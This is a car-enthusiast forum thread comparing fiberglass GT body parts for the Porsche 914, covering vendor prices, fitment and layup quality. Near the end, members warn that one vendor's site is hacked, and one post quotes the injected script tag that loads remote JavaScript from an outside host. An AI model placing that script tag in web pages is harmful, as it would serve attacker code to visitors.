Help - Search - Members - Calendar
Full Version: Question about fiberglass GT parts
914World.com > The 914 Forums > 914World Garage
ConeDodger
Question for you guys with experience building GT look cars. I have heard that GT Racing and Getty Products are the best quality fiberglass parts. I just checked pricing in their current online catalogs and come up with the following:

Getty:
Front valance $229
Side GT rockers $229

GT Racing:
Front valance $190
Side GT rockers $259

So, basically price is a wash. But what about fitment, quality of product etc?
laflaur
Hey Rob,
I got the gt racing stuff and it fit pretty well without too much fuss.It is not perfect but,with the pieces I got and my limited skills it fit good.Do you still have the fg bumpers I sold you?
realred914
QUOTE(ConeDodger @ Dec 6 2010, 10:10 AM) *

Question for you guys with experience building GT look cars. I have heard that GT Racing and Getty Products are the best quality fiberglass parts. I just checked pricing in their current online catalogs and come up with the following:

Getty:
Front valance $229
Side GT rockers $229

GT Racing:
Front valance $190
Side GT rockers $259

So, basically price is a wash. But what about fitment, quality of product etc?

id ask about the number and type of cloth layers used, and if a matt layer is also used Matt layers add inpact resistance. some fiber parts are made with a chopper gun, which puts down a matt type pattern of glass fibers. so inquire on teh glass build up how it is done, and the number and type of layers used. also ask about the resin system each vendor uses, an epoxy base is generally nicer than a polyester base, but more pricey. ask also about the final thickness and wieght of the part. you dont want a high weight part with low glass count as that measn it is not reinforced too well, tooo much resin.

that is the kind of stuff you want ot ask about when selecting fiber glass parts. as that will determine how strong they are and how stable they are.

good luck, my the glass be with you.
carr914
GT Racing rockers & valance will fit like ass. They have used the molds so many times that the size is wrong.

laflaur
Hey Rob,
My gt valences fit pretty good,although I did purchase them 10 years ago
ymmv
ConeDodger
QUOTE(laflaur @ Dec 6 2010, 10:21 AM) *

Hey Rob,
I got the gt racing stuff and it fit pretty well without too much fuss.It is not perfect but,with the pieces I got and my limited skills it fit good.Do you still have the fg bumpers I sold you?

John,
Shortly after I got the fg bumpers from you, I found some chrome ones that were in good shape. Then, out of the blue - I had a patient notice all of the Excellence Magazines I had in the back. Turns out he has a chroming shop in North Highlands. I waited a few weeks to give him recovery time and then brought both my Z car and 914 bumpers. 3 weeks later, I picked them up. He took good care of me too...
laflaur
Ah good deal, my early metal ones are in great shape but painted black.
I will try to make it out to the reunion in January.
ellisor3
I just did this project this past weekend. The rocker panels fit very well without much adjustment. Had to shave the backs some. The rear valence was too wide, due to the mold as TC said. Had to trim and refit.
pete-stevers
my car has gt bumpers and valances
not sure where i got my side valences
but fiberglass is fun/easy to work with, and you may need to aquaint yourself with it if you want it to fit any where near close....with any of the glass suppliers
i have heard gt is the best of the worst,
ConeDodger
QUOTE(laflaur @ Dec 6 2010, 11:06 AM) *

Ah good deal, my early metal ones are in great shape but painted black.
I will try to make it out to the reunion in January.

Dude! You need to see the light of day... I expected to see you next right after your daughter graduates from high school! lol-2.gif
ConeDodger
QUOTE(ellisor3 @ Dec 6 2010, 11:28 AM) *

I just did this project this past weekend. The rocker panels fit very well without much adjustment. Had to shave the backs some. The rear valence was too wide, due to the mold as TC said. Had to trim and refit.

James if I interpret you correctly, you used GT Racing stuff?
laflaur
Yeah,yeah
She just started the first grade,and I have a new job that is taking up about 80 hours a week.
But seriously I will start a new members thread with some pictures of the car.I put one up in the show your ride thread earlier.
I figure after all the time I have been lurking maybe it was time to get my post count up!
ConeDodger
QUOTE(laflaur @ Dec 6 2010, 01:21 PM) *

Yeah,yeah
She just started the first grade,and I have a new job that is taking up about 80 hours a week.
But seriously I will start a new members thread with some pictures of the car.I put one up in the show your ride thread earlier.
I figure after all the time I have been lurking maybe it was time to get my post count up!

More importantly, get out and enjoy the car. If anyone is interested, I just added RPM Kart Racing to the January 1st event. We can head over there right after 1pm when we leave the donut shop...
ellisor3
QUOTE(ConeDodger @ Dec 6 2010, 03:58 PM) *

James if I interpret you correctly, you used GT Racing stuff?

Here is the link. I hope to post photos by the end of the week. "Bringing Sexy Back"

http://www.showcars-bodyparts.com/PORSCHE914.html
matthepcat
I honestly have had great luck with QRS Fiberglass.

http://www.qrsfiberglass.com/

He is out of Hemet CA, so fast shipping for your CA location.

All his stuff comes with mounting brackets ready to go, and he will modify his offerings to fit your needs.
carr914
QUOTE(ellisor3 @ Dec 6 2010, 04:37 PM) *

QUOTE(ConeDodger @ Dec 6 2010, 03:58 PM) *

Here is the link. I hope to post photos by the end of the week. "Bringing Sexy Back"

http://www.showcars-bodyparts.com/PORSCHE914.html

James, those are the same pictures from the old A.I.R. site
SirAndy
QUOTE(carr914 @ Dec 6 2010, 01:51 PM) *
James, those are the same pictures from the old A.I.R. site

In fact, those are scans of the old AIR catalog. confused24.gif

I have a copy right here ...
ELLIOTT
does nayone else get a virus warning when going to the QRS link ?
jasons
QUOTE(ELLIOTT @ Dec 6 2010, 03:14 PM) *

Are you running Avast? I get a warning on Avast at home. I think he must be using some kind of script or object or something that Avast doesn't trust. I don't get the warning at work on Symantec.
SirAndy
QUOTE(ELLIOTT @ Dec 6 2010, 02:14 PM) *

Yepp. The site has been hacked for years. I emailed them back then but they never responded.

There's a injected JavaScript link to a script that will try to access your local file system ...

CODE
<script type="text/javascript" src="http://dodo.busop.info:8080/Bcc.js"></script>
jasons
QUOTE(SirAndy @ Dec 6 2010, 03:24 PM) *

There's a injected JavaScript link to a script that will try to access your local file system ...

CODE
<script type="text/javascript" src="http://dodo.busop.info:8080/Bcc.js"></script>

Hijack on:

How do you know that what its trying to do? I believe you, I am just curious.

Hijack off:
ELLIOTT
ya , I'm using avast
plymouth37
The rear lid, bumpers, and gt rockers I bought from Getty fit beautifully. My gt racing front lid fits like crap and every AIR bumper I had to fit when I worked at renegade was disgraceful. I would go with Getty hands down.
SirAndy
QUOTE(jasons @ Dec 6 2010, 02:40 PM) *
Hijack on:

How do you know that what its trying to do? I believe you, I am just curious.

Hijack off:

Because when this first came up (do a search here, there's at least one thread about this from a year or so ago) i downloaded the source code of the script in question and looked through it to see what it was trying to do ...
type.gif
SirAndy
Here you go, a thread about the same issue with the QRS Fiberglass website from 2008:

http://www.914world.com/bbs2/index.php?showtopic=91244
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2024 Invision Power Services, Inc.